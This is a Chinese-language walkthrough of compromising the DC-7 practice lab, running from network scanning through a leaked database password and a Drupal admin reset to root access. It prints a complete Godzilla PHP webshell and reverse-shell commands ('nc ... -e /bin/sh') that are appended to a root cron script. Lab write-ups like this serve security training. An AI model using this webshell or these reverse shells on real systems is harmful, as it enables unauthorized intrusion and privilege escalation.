DC-7靶机渗透详细流程

信息收集：

1.存活扫描：

由于靶机和kali都是nat的网卡，都在一个网段，我们用arp-scan会快一点：

arp-scan

arp-scan -I eth0 -l

└─# arp-scan -I eth0 -l  
Interface: eth0, type: EN10MB, MAC: 00:0c:29:dd:ee:6a, IPv4: 192.168.10.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1    00:50:56:c0:00:08       VMware, Inc.
192.168.10.2    00:50:56:e5:b1:08       VMware, Inc.
192.168.10.130 //靶机 00:0c:29:b8:22:3c       VMware, Inc.
192.168.10.254  00:50:56:ee:95:de       VMware, Inc.

2.端口扫描：

nmap -sS -p- 192.168.10.130

└─# nmap -sS -p- 192.168.10.130
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B8:22:3C (VMware)

3.服务扫描：

nmap -sS -sVC -p 80,22 -O --version-all 192.168.10.130

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
|_http-generator: Drupal 8 (https://www.drupal.org)
MAC Address: 00:0C:29:B8:22:3C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

4.Namp漏扫：

nmap -sS -p 80,22 --script=vuln 192.168.10.128

没啥信息

└─# nmap -sS -p 80,22 --script=vuln 192.168.10.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 21:49 CST
Nmap scan report for 192.168.10.130
Host is up (0.00041s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.10.130
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.10.130:80/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/node/1
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.10.130:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/node/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node/help
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.10.130:80/user/password
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.10.130:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.10.130:80/search/node/
|     Form id: search-form
|     Form action: /search/node/
|     
|     Path: http://192.168.10.130:80/search/node/
|     Form id: search-block-form
|_    Form action: /search/node
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /INSTALL.txt: Drupal file
|   /: Drupal version 8 
|_  /README.txt: Interesting, a readme.
MAC Address: 00:0C:29:B8:22:3C (VMware)

web部分：

web页面：

欢迎来到DC-7

DC-7引入了一些“新”概念，但我让你自己去弄清楚它们是什么

虽然这个挑战并不完全是技术性的，但如果您需要诉诸暴力强制或字典攻击，您可能不会成功。

你要做的，就是跳出思维定势。

“跳出”框框

在这里应该是想告诉我们，登录页面是使用不了SQL注入和弱口令的。

whatweb：

看样子CMS是Drupal 8

└─# whatweb http://192.168.10.130
http://192.168.10.130 [200 OK] Apache[2.4.25],
Content-Language[en], 
Country[RESERVED][ZZ], 
Drupal, HTML5, 
HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], 
IP[192.168.10.130], 
MetaGenerator[Drupal 8 (https://www.drupal.org)], 
PoweredBy[-block], Script, Title[Welcome to DC-7 | D7], 
UncommonHeaders[x-drupal-dynamic-cache,link,
x-content-type-options,x-generator,x-drupal-cache], 
X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]

Google：

web页面发现这个，结合作者的描述，是要用 Google 去搜索一下。

发现 GitHub 个人主页和配置文件，config.php。

<?php$servername = "localhost";$username = "dc7user";$password = "MdR3xOgB7#dW";$dbname = "Staff";$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

SSH：

这里发现的账密不能登录网页后台，但是可以ssh连接。

这里发现邮件。

dc7user@dc-7:~$ ls
backups  mbox
You have new mail in /var/mail/dc7user
dc7user@dc-7:~$ ls  /var/mail/dc7user/*
ls: cannot access '/var/mail/dc7user/*': Not a directory
dc7user@dc-7:~$ ls  /var/mail/dc7user
/var/mail/dc7user
dc7user@dc-7:~$ ls  backups/*
backups/website.sql.gpg  backups/website.tar.gz.gpg
dc7user@dc-7:~$ cat /var/mail/dc7user
From root@dc-7 Tue Feb 06 23:45:17 2024
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Tue, 06 Feb 2024 23:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89)(envelope-from <root@dc-7>)id 1rXLlF-0000H1-1Pfor root@dc-7; Tue, 06 Feb 2024 23:45:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1rXLlF-0000H1-1P@dc-7>
Date: Tue, 06 Feb 2024 23:45:17 +1000rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]From root@dc-7 Wed Feb 07 00:01:25 2024
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Wed, 07 Feb 2024 00:01:25 +1000
Received: from root by dc-7 with local (Exim 4.89)(envelope-from <root@dc-7>)id 1rXM0q-0000Yn-OVfor root@dc-7; Wed, 07 Feb 2024 00:01:24 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1rXM0q-0000Yn-OV@dc-7>
Date: Wed, 07 Feb 2024 00:01:24 +1000Database dump saved to /home/dc7user/backups/website.sql               [success]From root@dc-7 Wed Feb 07 17:00:27 2024
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Wed, 07 Feb 2024 17:00:27 +1000
Received: from root by dc-7 with local (Exim 4.89)(envelope-from <root@dc-7>)id 1rXbv1-0000FQ-7Zfor root@dc-7; Wed, 07 Feb 2024 17:00:27 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1rXbv1-0000FQ-7Z@dc-7>
Date: Wed, 07 Feb 2024 17:00:27 +1000Database dump saved to /home/dc7user/backups/website.sql               [success]From root@dc-7 Wed Feb 07 17:15:16 2024
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Wed, 07 Feb 2024 17:15:16 +1000
Received: from root by dc-7 with local (Exim 4.89)(envelope-from <root@dc-7>)id 1rXc9H-0000HM-QGfor root@dc-7; Wed, 07 Feb 2024 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1rXc9H-0000HM-QG@dc-7>
Date: Wed, 07 Feb 2024 17:15:11 +1000Database dump saved to /home/dc7user/backups/website.sql               [success]

发现可执行文件，看一下内容。

根据 资料内容 Drush 是用来管理 Drupal的shell 通过 Drash + 命令的形式来管理 Drupal。上面的提示应该是让我们修改网站后台的登陆密码。

我们通过重置密码的方式来 猜测网站登录的用户名，，发现是有admin这个用户名的

Drush

我们使用 Drush 来修改 admin 的密码，，修改成功，我们尝试登录。登录成功

drush user--password-'admin'changed password for admin

反弹shell：

我们根据 backups.sh 发现该文件可用于提权，且有执行权限的是www-data。

有了思路，我们先上传木马获取webshell。cms是 drupal 8 的版本，得安装插件才能写入php语句。

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

这样就ok了，找个地方编辑一下 测试一下。

测试成功

开始写入木马，这里我们用 哥斯拉webshell。

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$pass='kitha';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if (strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if (strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}
}

我们把反弹shell的命令追加到 backups.sh 中，这边定时执行就会反弹shell得到root权限。

echo nc -e /bin/bash/ 192.168.10.129 2233 >>backups.sh //这里的/bin/bash 反弹不上
echo nc 192.168.10.129 7788 -e /bin/sh >> backups.sh

这里不知道为啥， /bin/bash的 shell 一直连接不上，好在最后还是拿到了 root 权限。

大伙这里自己看吧。